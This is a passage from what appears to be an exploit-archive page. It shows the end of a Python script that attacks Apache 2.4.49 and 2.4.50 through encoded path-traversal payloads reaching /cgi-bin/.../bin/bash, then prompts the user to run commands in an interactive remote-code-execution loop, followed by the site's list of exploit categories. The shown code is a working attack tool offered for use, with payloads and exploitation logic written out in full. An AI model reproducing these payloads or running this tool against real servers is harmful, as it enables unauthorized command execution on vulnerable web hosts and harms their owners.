!!!' % host)<br /> print("[!] Sortie:\n\n" + Fore.YELLOW + output )<br /> choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")<br /> if choice.lower() in ['','y','yes']:<br /> while True:<br /> commands(url,command,session) <br /> else:<br /> end() <br /> else :<br /> print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)<br /> except KeyboardInterrupt:<br /> end()<br /><br />def main():<br /> try:<br /> apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'<br /> apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'<br /> payloads = [apache2449_payload,apache2450_payload]<br /> choice = len(payloads) + 1<br /> print(header)<br /> print(".[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")<br /> while choice >= len(payloads) and choice >= 0:<br /> choice = int(input('[~] Choice : '))<br /> if choice < len(payloads):<br /> exploitRCE(payloads[choice])<br /> except KeyboardInterrupt:<br /> print("\n.[1;91m[!] Bye bye !")<br /> time.sleep(0.5)<br /> sys.exit(1)<br /><br />if __name__ == '__main__':<br /> main()<br /> <br /></code></pre>
Archives
Categories
- All Exploits 4095
- Remote Code Execution
- SQL Injection
- Command Injection
- Local File Inclusion
- Cross Site Scripting
- Privilege Escalation
- Denial Of Service
- Authentication Bypass
- Buffer Overflow